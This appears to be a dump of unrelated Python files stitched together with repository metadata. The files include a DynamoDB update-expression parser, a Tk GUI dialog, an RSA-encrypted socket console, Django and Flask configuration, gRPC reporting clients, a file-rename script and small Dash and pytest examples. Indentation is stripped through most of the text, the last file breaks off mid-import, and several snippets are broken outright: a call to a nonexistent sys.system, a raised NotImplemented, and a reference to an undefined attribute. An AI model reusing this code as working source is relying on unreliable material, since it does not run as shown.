self.path_nodes = []
@classmethod
def _is_possible_start(cls, token):
"""
Args:
token(Token): the token to be checked
Returns:
bool: Whether the token could be the start of an UpdateExpressionPath
"""
if token.type == Token.ATTRIBUTE_NAME:
return True
elif token.type == Token.ATTRIBUTE and token.value.upper() != "REMOVE":
"""We have to make sure remove is not passed"""
return True
return False
def _parse(self):
return self.process_path()
def process_path(self):
self.parse_path()
return UpdateExpressionPath(children=self.path_nodes)
def parse_path(self):
"""
A path is comprised of:
- Attribute: the name of an attribute as how it is stored which has no special characters
        - ATTRIBUTE_NAME: A placeholder that has no special characters except a leading # to refer to attributes
                          whose name is not allowed in an UpdateExpression
        - DOT's: These are used to descend into a nested structure. When a DOT is in a path expression it is never
                 part of an attribute name but always means to descend into a MAP. We will call each descent a path
                 chain
- SELECTORs: E.g.: [1] These are used to select an element in ordered datatypes like a list.
Whitespaces can be between all these elements that build a path. For SELECTORs it is also allowed to have
whitespaces between brackets and numbers but the number cannot be split up with spaces
Attributes and attribute_names must be separated with DOT's.
Returns:
UpdateExpressionPath:
"""
self.parse_path_chain()
while self.is_next_token_start_of_patch_chain():
self.process_dot()
self.parse_path_chain()
def is_next_token_start_of_patch_chain(self):
return self.get_next_token_type() == Token.DOT
def process_dot(self):
self.path_nodes.append(ExpressionPathDescender())
self.goto_next_significant_token()
def parse_path_chain(self):
self.process_attribute_identifying_token()
self.skip_white_space()
while self.is_next_token_start_of_selector():
self.process_selector()
self.skip_white_space()
def process_attribute_identifying_token(self):
if self.get_next_token_type() == Token.ATTRIBUTE:
self.path_nodes.append(ExpressionAttribute(self.get_next_token_value()))
elif self.get_next_token_type() == Token.ATTRIBUTE_NAME:
self.path_nodes.append(ExpressionAttributeName(self.get_next_token_value()))
else:
self.raise_unexpected_token()
self.goto_next_significant_token()
def is_next_token_start_of_selector(self):
return self.get_next_token_type() == Token.OPEN_SQUARE_BRACKET
def process_selector(self):
"""
        process_selector is only called when a selector must be processed. It performs the following actions:
- skip opening bracket
- skip optional spaces
- read numeric literal
- skip optional spaces
- pass closing bracket
"""
self.process_token_of_type(Token.OPEN_SQUARE_BRACKET)
selector_value = self.process_token_of_type(Token.NUMBER)
self.process_token_of_type(Token.CLOSE_SQUARE_BRACKET)
self.path_nodes.append(ExpressionSelector(selector_value))
class UpdateExpressionValueParser(NestableBinExpressionParser):
@classmethod
def _is_possible_start(cls, token):
return UpdateExpressionOperandParser.is_possible_start(token)
def _operand_factory_class(self):
return UpdateExpressionOperandParser
def _binop_factory_class(self):
return UpdateExpressionValueOperatorParser
class UpdateExpressionGroupedValueParser(ExpressionParser):
"""
A grouped value is an Update Expression value clause that is surrounded by round brackets. Each Operand can be
a grouped value by itself.
"""
def _parse(self):
self.process_token_of_type(Token.OPEN_ROUND_BRACKET)
value, self.token_pos = UpdateExpressionValueParser(
**self._initializer_args()
)._parse_with_pos()
self.process_token_of_type(Token.CLOSE_ROUND_BRACKET)
return UpdateExpressionGroupedValue(children=value)
@classmethod
def _is_possible_start(cls, token):
return token.type == Token.OPEN_ROUND_BRACKET
class UpdateExpressionValueOperatorParser(ExpressionParser):
OPERATION_TOKENS = [Token.PLUS_SIGN, Token.MINUS_SIGN]
@classmethod
def _is_possible_start(cls, token):
return token.type in cls.OPERATION_TOKENS
def _parse(self):
operation_value = self.get_next_token_value()
assert operation_value in self.OPERATION_TOKENS
self.goto_next_significant_token()
return ExpressionValueOperator(operation_value)
class UpdateExpressionOperandParser(ExpressionParser):
"""
Grammar
Operand* => AttributeValue
Operand* => UpdateExpressionFunction
Operand* => Path
Operand* => GroupedValue
"""
@classmethod
def _sub_factories(cls):
return [
UpdateExpressionAttributeValueParser,
UpdateExpressionFunctionParser,
UpdateExpressionPathParser,
UpdateExpressionGroupedValueParser,
]
@classmethod
def _is_possible_start(cls, token):
return any(parser.is_possible_start(token) for parser in cls._sub_factories())
def _parse(self):
for factory in self._sub_factories():
if factory.is_possible_start(self.get_next_token()):
node, self.token_pos = factory(
**self._initializer_args()
)._parse_with_pos()
return node
self.raise_unexpected_token()
class UpdateExpressionAttributeValueParser(ExpressionParser):
def _parse(self):
attr_value = ExpressionAttributeValue(
self.process_token_of_type(Token.ATTRIBUTE_VALUE)
)
return attr_value
@classmethod
def _is_possible_start(cls, token):
return token.type == Token.ATTRIBUTE_VALUE
class UpdateExpressionAttributeValueOrPathParser(ExpressionParser):
def _parse(self):
if UpdateExpressionAttributeValueParser.is_possible_start(
self.get_next_token()
):
token, self.token_pos = UpdateExpressionAttributeValueParser(
**self._initializer_args()
)._parse_with_pos()
else:
token, self.token_pos = UpdateExpressionPathParser(
**self._initializer_args()
)._parse_with_pos()
return token
@classmethod
def _is_possible_start(cls, token):
return any(
[
UpdateExpressionAttributeValueParser.is_possible_start(token),
UpdateExpressionPathParser.is_possible_start(token),
]
)
class UpdateExpressionFunctionParser(ExpressionParser):
"""
A helper to process a function of an Update Expression
"""
# Map function to the factories for its elements
FUNCTIONS = {
"if_not_exists": [
UpdateExpressionPathParser,
UpdateExpressionAttributeValueOrPathParser,
],
"list_append": [UpdateExpressionOperandParser, UpdateExpressionOperandParser],
}
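    # Illustrative calls (placeholder names are assumed):
    #   if_not_exists(#attr, :default) -> parses a path, then a value-or-path
    #   list_append(#attr, :items)     -> parses two operands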
@classmethod
def _is_possible_start(cls, token):
"""
Check whether a token is supposed to be a function
Args:
token(Token): the token to check
Returns:
bool: True if token is the start of a function.
"""
if token.type == Token.ATTRIBUTE:
return token.value in cls.FUNCTIONS.keys()
else:
return False
def _parse(self):
function_name = self.get_next_token_value()
if function_name not in self.FUNCTIONS.keys():
# Function names are case sensitive
raise InvalidUpdateExpression(function_name)
self.goto_next_significant_token()
self.process_token_of_type(Token.OPEN_ROUND_BRACKET)
function_elements = [function_name]
function_arguments = self.FUNCTIONS[function_name]
for i, func_elem_factory in enumerate(function_arguments):
func_elem, self.token_pos = func_elem_factory(
**self._initializer_args()
)._parse_with_pos()
function_elements.append(func_elem)
if i + 1 < len(function_arguments):
self.skip_white_space()
self.process_token_of_type(Token.COMMA)
self.process_token_of_type(Token.CLOSE_ROUND_BRACKET)
return UpdateExpressionFunction(children=function_elements)
class UpdateExpressionRemoveClauseParser(ExpressionParser):
"""
UpdateExpressionRemoveClause => REMOVE RemoveActions
"""
def _parse(self):
assert self.is_possible_start(self.get_next_token())
self.goto_next_significant_token()
ast, self.token_pos = UpdateExpressionRemoveActionsParser(
**self._initializer_args()
)._parse_with_pos()
# noinspection PyProtectedMember
return UpdateExpressionRemoveClause(children=[ast])
@classmethod
def _is_possible_start(cls, token):
"""REMOVE is not a keyword"""
return token.type == Token.ATTRIBUTE and token.value.upper() == "REMOVE"
class UpdateExpressionRemoveActionsParser(UpdateExpressionActionsParser):
"""
UpdateExpressionSetActions
"""
@classmethod
def _nested_expression_parser_class(cls):
return UpdateExpressionRemoveActionParser
@classmethod
def _nestable_class(cls):
return UpdateExpressionRemoveActions
class UpdateExpressionRemoveActionParser(ExpressionParser):
"""
RemoveAction => Path = Value
So we create an UpdateExpressionSetAction Node that has 2 children. Left child Path and right child Value.
"""
@classmethod
def _is_possible_start(cls, token):
return UpdateExpressionPathParser.is_possible_start(token)
def _parse(self):
"""
        UpdateExpressionRemoveActionParser is only invoked when a RemoveAction is expected, so we can be
        aggressive about raising on invalid tokens. The steps are:
        1) Process the path
        2) Skip any whitespace
"""
path, self.token_pos = UpdateExpressionPathParser(
**self._initializer_args()
)._parse_with_pos()
self.skip_white_space()
return UpdateExpressionRemoveAction(children=[path])
class UpdateExpressionAddClauseParser(ExpressionParser):
def _parse(self):
assert self.is_possible_start(self.get_next_token())
self.goto_next_significant_token()
ast, self.token_pos = UpdateExpressionAddActionsParser(
**self._initializer_args()
)._parse_with_pos()
# noinspection PyProtectedMember
return UpdateExpressionAddClause(children=[ast])
@classmethod
def _is_possible_start(cls, token):
return token.type == Token.ATTRIBUTE and token.value.upper() == "ADD"
class UpdateExpressionAddActionsParser(UpdateExpressionActionsParser):
"""
UpdateExpressionSetActions
"""
@classmethod
def _nested_expression_parser_class(cls):
return UpdateExpressionAddActionParser
@classmethod
def _nestable_class(cls):
return UpdateExpressionAddActions
@six.add_metaclass(abc.ABCMeta)
class UpdateExpressionPathValueParser(ExpressionParser):
def _parse_path_and_value(self):
"""
UpdateExpressionAddActionParser only gets called when expecting an AddAction. So we should be aggressive on
raising invalid Tokens. We can thus do the following:
1) Process path
2) skip whitespace if there are any
3) Process a value
4) skip whitespace if there are any
Returns:
[path, value]: A list containing the Path node and the AttributeValue nodes
"""
path, self.token_pos = UpdateExpressionPathParser(
**self._initializer_args()
)._parse_with_pos()
self.skip_white_space()
value, self.token_pos = UpdateExpressionAttributeValueParser(
**self._initializer_args()
)._parse_with_pos()
self.skip_white_space()
return [path, value]
class UpdateExpressionAddActionParser(UpdateExpressionPathValueParser):
@classmethod
def _is_possible_start(cls, token):
return UpdateExpressionPathParser.is_possible_start(token)
def _parse(self):
return UpdateExpressionAddAction(children=self._parse_path_and_value())
class UpdateExpressionDeleteClauseParser(ExpressionParser):
def _parse(self):
assert self.is_possible_start(self.get_next_token())
self.goto_next_significant_token()
ast, self.token_pos = UpdateExpressionDeleteActionsParser(
**self._initializer_args()
)._parse_with_pos()
# noinspection PyProtectedMember
return UpdateExpressionDeleteClause(children=[ast])
@classmethod
def _is_possible_start(cls, token):
return token.type == Token.ATTRIBUTE and token.value.upper() == "DELETE"
class UpdateExpressionDeleteActionsParser(UpdateExpressionActionsParser):
"""
UpdateExpressionSetActions
"""
@classmethod
def _nested_expression_parser_class(cls):
return UpdateExpressionDeleteActionParser
@classmethod
def _nestable_class(cls):
return UpdateExpressionDeleteActions
class UpdateExpressionDeleteActionParser(UpdateExpressionPathValueParser):
@classmethod
def _is_possible_start(cls, token):
return UpdateExpressionPathParser.is_possible_start(token)
def _parse(self):
return UpdateExpressionDeleteAction(children=self._parse_path_and_value())
| 2.484375 | 2 |
dftbplus_step/tk_optimization.py | molssi-seamm/dftbplus_step | 1 | 4932 | # -*- coding: utf-8 -*-
"""The graphical part of a DFTB+ Optimization node"""
import logging
import tkinter as tk
import tkinter.ttk as ttk
import dftbplus_step
logger = logging.getLogger(__name__)
class TkOptimization(dftbplus_step.TkEnergy):
def __init__(
self,
tk_flowchart=None,
node=None,
canvas=None,
x=120,
y=20,
w=200,
h=50,
my_logger=logger,
keyword_metadata=None,
):
"""Initialize the graphical Tk DFTB+ optimization step
Keyword arguments:
"""
self.results_widgets = []
super().__init__(
tk_flowchart=tk_flowchart,
node=node,
canvas=canvas,
x=x,
y=y,
w=w,
h=h,
my_logger=my_logger,
keyword_metadata=keyword_metadata,
)
def right_click(self, event):
"""Probably need to add our dialog..."""
super().right_click(event)
self.popup_menu.add_command(label="Edit..", command=self.edit)
self.popup_menu.tk_popup(event.x_root, event.y_root, 0)
def create_dialog(
self, title="Edit DFTB+ Optimization Step", calculation="optimization"
):
"""Create the dialog!"""
self.logger.debug("Creating the dialog")
super().create_dialog(title=title, calculation=calculation)
# Create all the widgets
P = self.node.parameters
# Frame to isolate widgets
opt_frame = self["optimization frame"] = ttk.LabelFrame(
self["frame"],
borderwidth=4,
relief="sunken",
text="Optimization Parameters",
labelanchor="n",
padding=10,
)
for key in dftbplus_step.OptimizationParameters.parameters:
self[key] = P[key].widget(opt_frame)
self.logger.debug("Finished creating the dialog")
def reset_dialog(self, widget=None):
super().reset_dialog()
row = 0
self["optimization frame"].grid(row=row, column=1, sticky=tk.EW)
row += 1
# And the widgets in our frame
self.reset_optimization_frame()
return row
def reset_optimization_frame(self):
"""Layout the optimization frame according to the current values.
SD CG gDIIS LBFGS FIRE
------------------ ------------------- ------------------- ------------------- --------
MovedAtoms MovedAtoms MovedAtoms MovedAtoms TimeStep
MaxForceComponent MaxForceComponent MaxForceComponent MaxForceComponent
MaxSteps MaxSteps MaxSteps MaxSteps
OutputPrefix OutputPrefix OutputPrefix OutputPrefix
AppendGeometries AppendGeometries AppendGeometries AppendGeometries
Constraints Constraints Constraints Constraints
LatticeOpt LatticeOpt LatticeOpt LatticeOpt
FixAngles FixAngles FixAngles FixAngles
FixLengths
Isotropic Isotropic Isotropic Isotropic
Pressure Pressure Pressure Pressure
MaxAtomStep MaxAtomStep MaxAtomStep
MaxLatticeStep MaxLatticeStep MaxLatticeStep MaxLatticeStep
ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly
StepSize Alpha Memory
Generations LineSearch
""" # noqa: E501
frame = self["optimization frame"]
for slave in frame.grid_slaves():
slave.grid_forget()
method = self["optimization method"].get()
widgets = []
widgets1 = []
row = 0
w = self["optimization method"]
w.grid(row=row, column=0, columnspan=2, sticky=tk.EW)
widgets.append(w)
row += 1
if method == "Steepest descents":
w = self["StepSize"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
elif "gDIIS" in method:
w = self["Alpha"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
w = self["Generations"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
elif "LBFGS" in method:
w = self["Memory"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
w = self["LineSearch"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
for widget in (
"MaxForceComponent",
"MaxSteps",
"MaxAtomStep",
"stop_if_scc_fails",
):
w = self[widget]
w.grid(row=row, column=0, columnspan=2, sticky=tk.EW)
widgets.append(w)
row += 1
return row
| 2.703125 | 3 |
console.py | aplneto/redes_projeto | 1 | 4933 | <filename>console.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Módulo de configuração dos consoles
"""
from Crypto.PublicKey import RSA
import socket
import os
import base64
class Console(object):
"""Superclasse Console
Classe base para os terminais de cliente e servidor.
Attributes:
logged (bool): True caso o usuário tenha realizado o login com sucesso,
False caso contrário
"""
def __init__(self, **kwargs):
"""Método construtor do console
Kwargs:
sock (socket): socket de comunicação
key_file (str): arquivo para inicialização de par de chaves
"""
self.sock = kwargs.get('sock',
socket.socket(socket.AF_INET,
socket.SOCK_STREAM))
key_file = kwargs.get('key_file', '')
if key_file:
self.privatekey, self.publickey = Console.start_key(key_file)
def run(self):
"""Método run difere entre o Console do Host e o do Client
O Método run controla o comportamento do objeto como um todo.
Todo o comportamento de um console individual deve ser definido dentro
do método run.
"""
raise NotImplemented
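    # Illustrative override sketch (assumed, not part of the original module):
    #
    #     class EchoConsole(Console):
    #         def run(self):
    #             self.send("hello")
    #             print(self.receive())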
@staticmethod
def start_key(key_file):
"""Método de inicialização das chaves
Esse método inicializa a chave privada e prepara, também, a chave
pública para envio.
Args:
key_file (str): endereço do arquivo da chave privada
Returns:
(tuple) uma tupla contendo um par _RSAobj (chave privada) e byte
(inicializador da chave pública)
"""
try:
keyfile = open(key_file, 'rb')
except FileNotFoundError:
private_key = RSA.generate(1024)
else:
private_key = RSA.importKey(keyfile.read())
keyfile.close()
finally:
public_key = private_key.publickey().exportKey()
return private_key, public_key
def receive_key(self):
"""Troca de chaves no início da comunicação
Ao se conectarem, servidor e cliente trocam suas chaves públicas um com
o outro. Esse método retorna um objeto do tipo RSA público a partir da
chave pública recebida através de um socket.
Returns:
(_RSAobj) chave pública para criptografia.
"""
k = self.sock.recv(1024)
key = RSA.importKey(k)
return key
def send(self, msg):
"""Método send envia strings simples através do socket
O Método send é o método usado apara enviar mensagens simples através
de um socket. Dentro desse método ocorrem as criptografias RSA e base64
antes do envio."
Args:
msg (str ou bytes): mensagem a ser enviada
"""
msg = self.encrypt(msg)
self.sock.send(msg)
def receive(self, b = 160):
"""Método receive recebe mensagens simples através do socket
É através desse método que o usuário recebe mensagens simples através
do socket. As mensagens chegam criptografadas e a descriptografia
acontece dentro do método receive.
Args:
b (int): quantidade de bytes a serem recebidos
Returns:
(str) mensagem decifrada
"""
msg = self.decrypt(self.sock.recv(b))
return msg.decode('utf-8')
def encrypt(self, msg):
"""Criptografia de uma string ou trecho de bytes
Args:
msg (str ou bytes): string ou bytes a serem criptografados.
Returns:
(bytes) segmento de bytes criptografados
"""
if isinstance(msg, str):
msg = msg.encode('utf-8')
msg = self.publickey.encrypt(msg, 3.14159265359)
msg = base64.a85encode(msg[0])
return msg
def decrypt(self, msg):
"""Método de conversão de um trecho criptografado
Args:
msg (bytes): trecho de mensagem a ser decifrado
Returns:
(bytes): trecho de bytes decifrados
"""
msg = base64.a85decode(msg)
msg = self.privatekey.decrypt(msg)
return msg
def send_file(self, filename):
"""Rotina de envio de arquivos através de sockets
Esse método controla o envio sequencial de segmentos de um arquivo
através de um socket, gerando a cada envio um número inteiro referente
a quantidade de bytes enviados até o momento.
Método deve ser usado como um gerador. Veja exemplo abaixo.
Example:
for b in self.sendfile('alice.txt'):
if b == -1:
print("Houve um erro na transferência")
else:
print(str(b) + "de " str(file_size) "bytes enviados")
Args:
filename (str): endereço do arquivo
Yields:
(int) quantidade de bytes enviados ou -1, em caso de erro
"""
size = os.path.getsize(filename)
self.send(str(size))
sent = 0
file = open(filename, 'rb')
while sent < size:
ack = self.receive()
nxt = file.read(1024)
self.sock.send(nxt)
sent += len(nxt)
yield sent
file.close()
def receive_file(self, filename):
"""Rotina de recebimento de arquivos através de sockets
Esse método controla o recebeimendo de sementos de arquivos através de
um socket. O método gera a quantidade de bytes recebidos a cada nova
mensagem recebida do socket, por tanto, deve ser usado como um gerador.
Example:
for b in receive_file(filename):
print(str(b) + " de " str(filesize) " bytes recebidos.")
Args:
filename(str): nome do arquivo
Yields:
(int) quantidade de bytes recebidos
"""
size = int(self.receive())
file = open(filename, 'wb')
rcvd = 0
while rcvd < size:
self.send('ack')
nxt = self.sock.recv(1024)
rcvd += len(nxt)
file.write(nxt)
yield rcvd
file.close()
def __repr__(self):
return "{0}({1}, {2}, key_file = {3})".format(self.__class__.__name__,
self.sock.__repr__(), self.client.__repr__(),
repr(self.key_file)) | 3.125 | 3 |
sandbox/settings.py | OmenApps/marion | 0 | 4934 | <filename>sandbox/settings.py<gh_stars>0
"""
Django settings for marion project.
"""
from pathlib import Path
from tempfile import mkdtemp
from configurations import Configuration, values
BASE_DIR = Path(__file__).parent.resolve()
DATA_DIR = Path("/data")
# pylint: disable=no-init
class Base(Configuration):
"""
    This is the base configuration every configuration (aka environment)
    should inherit from. It is recommended to configure third-party
    applications by creating configuration mixins in ./configurations and
    composing the Base configuration with those mixins.
It depends on an environment variable that SHOULD be defined:
* DJANGO_SECRET_KEY
You may also want to override default configuration by setting the
following environment variables:
* DB_NAME
* DB_HOST
* DB_PASSWORD
* DB_USER
"""
DEBUG = False
# Security
ALLOWED_HOSTS = []
SECRET_KEY = values.Value(None)
    # SECURE_PROXY_SSL_HEADER allows fixing the scheme in Django's HttpRequest
    # object when your application is behind a reverse proxy.
#
    # Keep this SECURE_PROXY_SSL_HEADER configuration only if:
    # - your Django app is behind a proxy,
    # - your proxy strips the X-Forwarded-Proto header from all incoming requests,
    # - your proxy sets the X-Forwarded-Proto header and sends it to Django.
#
# In other cases, you should comment the following line to avoid security issues.
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": (
"django.contrib.auth.password_validation."
"UserAttributeSimilarityValidator"
),
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Application
ROOT_URLCONF = "urls"
WSGI_APPLICATION = "wsgi.application"
# Database
DATABASES = {
"default": {
"ENGINE": values.Value(
"django.db.backends.postgresql_psycopg2",
environ_name="DB_ENGINE",
environ_prefix=None,
),
"NAME": values.Value("marion", environ_name="DB_NAME", environ_prefix=None),
"USER": values.Value("fun", environ_name="DB_USER", environ_prefix=None),
"PASSWORD": values.Value(
"pass", environ_name="DB_PASSWORD", environ_prefix=None
),
"HOST": values.Value(
"localhost", environ_name="DB_HOST", environ_prefix=None
),
"PORT": values.Value(5432, environ_name="DB_PORT", environ_prefix=None),
}
}
# Static files (CSS, JavaScript, Images)
STATIC_URL = "/static/"
STATIC_ROOT = DATA_DIR.joinpath("static")
MEDIA_URL = "/media/"
MEDIA_ROOT = DATA_DIR.joinpath("media")
# Internationalization
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"rest_framework",
"marion",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
class Development(Base):
"""
Development environment settings
We set DEBUG to True and configure the server to respond from all hosts.
"""
DEBUG = True
ALLOWED_HOSTS = ["*"]
ROOT_URLCONF = "urls.debug"
# Application definition
INSTALLED_APPS = Base.INSTALLED_APPS + [
"howard",
]
MARION_DOCUMENT_ISSUER_CHOICES_CLASS = "howard.defaults.DocumentIssuerChoices"
class Test(Base):
"""Test environment settings"""
MEDIA_ROOT = Path(mkdtemp())
ROOT_URLCONF = "urls.debug"
| 2.125 | 2 |
skywalking/client/grpc.py | cooolr/skywalking-python | 0 | 4935 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import grpc
from skywalking.protocol.common.Common_pb2 import KeyStringValuePair
from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub
from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub
from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties
from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub
from skywalking.protocol.profile.Profile_pb2 import ProfileTaskCommandQuery
from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub
from skywalking import config
from skywalking.client import ServiceManagementClient, TraceSegmentReportService, ProfileTaskChannelService, \
LogDataReportService
from skywalking.command import command_service
from skywalking.loggings import logger
from skywalking.profile import profile_task_execution_service
class GrpcServiceManagementClient(ServiceManagementClient):
def __init__(self, channel: grpc.Channel):
self.service_stub = ManagementServiceStub(channel)
def send_instance_props(self):
self.service_stub.reportInstanceProperties(InstanceProperties(
service=config.service_name,
serviceInstance=config.service_instance,
properties=[KeyStringValuePair(key='language', value='Python')],
))
def send_heart_beat(self):
logger.debug(
'service heart beats, [%s], [%s]',
config.service_name,
config.service_instance,
)
self.service_stub.keepAlive(InstancePingPkg(
service=config.service_name,
serviceInstance=config.service_instance,
))
class GrpcTraceSegmentReportService(TraceSegmentReportService):
def __init__(self, channel: grpc.Channel):
self.report_stub = TraceSegmentReportServiceStub(channel)
def report(self, generator):
self.report_stub.collect(generator)
class GrpcLogDataReportService(LogDataReportService):
def __init__(self, channel: grpc.Channel):
self.report_stub = LogReportServiceStub(channel)
def report(self, generator):
self.report_stub.collect(generator)
class GrpcProfileTaskChannelService(ProfileTaskChannelService):
def __init__(self, channel: grpc.Channel):
self.task_stub = ProfileTaskStub(channel)
def do_query(self):
query = ProfileTaskCommandQuery(
service=config.service_name,
serviceInstance=config.service_instance,
lastCommandTime=profile_task_execution_service.get_last_command_create_time()
)
commands = self.task_stub.getProfileTaskCommands(query)
command_service.receive_command(commands)
| 1.65625 | 2 |
coingate/migrations/0004_auto_20200207_1959.py | glitzybunny/coingate_sandbox_payment | 2 | 4936 | # Generated by Django 3.0.3 on 2020-02-07 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('coingate', '0003_auto_20200207_1513'),
]
operations = [
migrations.RemoveField(
model_name='payment',
name='token',
),
migrations.AddField(
model_name='payment',
name='expire_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='payment',
name='pay_amount',
field=models.DecimalField(blank=True, decimal_places=1, max_digits=10, null=True),
),
migrations.AddField(
model_name='payment',
name='payment_address',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='payment',
name='created_at',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AlterField(
model_name='payment',
name='price_currency',
field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='USD', max_length=10),
),
migrations.AlterField(
model_name='payment',
name='receive_currency',
field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='BTC', max_length=10),
),
migrations.AlterField(
model_name='payment',
name='status',
field=models.CharField(choices=[('new', 'Newly created invoice'), ('pending', 'Awaiting payment'), ('confirming', 'Awaiting blockchain network confirmation'), ('paid', 'Confirmed'), ('invalid', 'Rejected'), ('expired', 'Expired'), ('canceled', 'Canceled'), ('refunded', 'Refunded')], default='new', max_length=10),
),
]
| 1.648438 | 2 |
space_trace/__init__.py | SpaceTeam/space-event-trace | 2 | 4937 | import toml
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__, instance_relative_config=True)
app.config.from_file("config.toml", load=toml.load)
db = SQLAlchemy(app)
@app.before_first_request
def create_table():
db.create_all()
from space_trace import views, cli
| 2.3125 | 2 |
ng/distributions/Distribution.py | forons/noise-generator | 0 | 4938 | <filename>ng/distributions/Distribution.py<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from enum import Enum
from .NormalDist import NormalDist
from .UniformDist import UniformDist
class Distribution(Enum):
UNIFORM = 0
GAUSSIAN = 1
POISSON = 2
@staticmethod
def determine_distribution(distribution, distribution_params):
distribution_upper = distribution.upper()
        if distribution_upper not in Distribution.__members__:
            raise IndexError('Distribution not supported `{}`. Try one of: {}'.format(
                distribution, [(elem.value, elem.name) for elem in Distribution]))
if Distribution[distribution_upper] == Distribution.UNIFORM:
if not distribution_params:
distribution_params = 0.5
return UniformDist(rate=float(distribution_params))
if Distribution[distribution_upper] == Distribution.GAUSSIAN:
if not distribution_params:
distribution_params = [0., 1.]
return NormalDist(loc=float(distribution_params[0]),
scale=float(distribution_params[1]))
if Distribution[distribution_upper] is Distribution.POISSON:
pass
raise IndexError('Distribution not supported `{}`. Try one of: {}'.format(
distribution, [(elem.value, elem.name) for elem in Distribution]))
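    # Illustrative usage (assumed):
    #   Distribution.determine_distribution('gaussian', ['0.0', '1.0'])
    #   -> NormalDist(loc=0.0, scale=1.0) from the sibling NormalDist module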
| 2.921875 | 3 |
test/rename.py | Riteme/test | 3 | 4939 | import os
import sys
filename = sys.argv[1]
from_id = int(sys.argv[2])
to_id = int(sys.argv[3])
for i in range(from_id, to_id + 1):
sys.system("mv {0}.in{1} {0}{1}.in".format(filename, i))
sys.system("mv {0}.out{1} {0}{1}.out".format(filename, i))
| 2.609375 | 3 |
TransitPass/urls.py | Savior-19/Savior19 | 0 | 4940 | <gh_stars>0
from django.urls import path
from . import views
urlpatterns = [
path('apply/', views.FillPassApplication, name='transit-pass-application-form'),
path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'),
path('view-application-list/', views.DisplayApplicationList, name='view-application-list'),
path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'),
path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'),
path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'),
] | 1.625 | 2 |
dash_docs/chapters/dash_core_components/Textarea/examples/textarea_basic.py | kozo2/dash-docs | 1 | 4941 | import dash
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_core_components as dcc
app = dash.Dash(__name__)
app.layout = html.Div([
dcc.Textarea(
id='textarea-example',
value='Textarea content initialized\nwith multiple lines of text',
style={'width': '100%', 'height': 300},
),
html.Div(id='textarea-example-output', style={'whiteSpace': 'pre-line'})
])
@app.callback(
Output('textarea-example-output', 'children'),
[Input('textarea-example', 'value')]
)
def update_output(value):
return 'You have entered: \n{}'.format(value)
if __name__ == '__main__':
app.run_server(debug=True)
| 2.546875 | 3 |
tests/test_wrapped_driver.py | balexander85/wrapped_driver | 0 | 4942 | import pytest
from selenium.common.exceptions import WebDriverException
from wrapped_driver import WrappedDriver
def test_empty_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(WebDriverException):
WrappedDriver(executable_path="", headless=True)
def test_no_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(TypeError):
WrappedDriver(headless=True)
| 2.65625 | 3 |
eth/vm/forks/petersburg/blocks.py | ggs134/py-evm | 1,641 | 4943 | <reponame>ggs134/py-evm
from rlp.sedes import (
CountableList,
)
from eth.rlp.headers import (
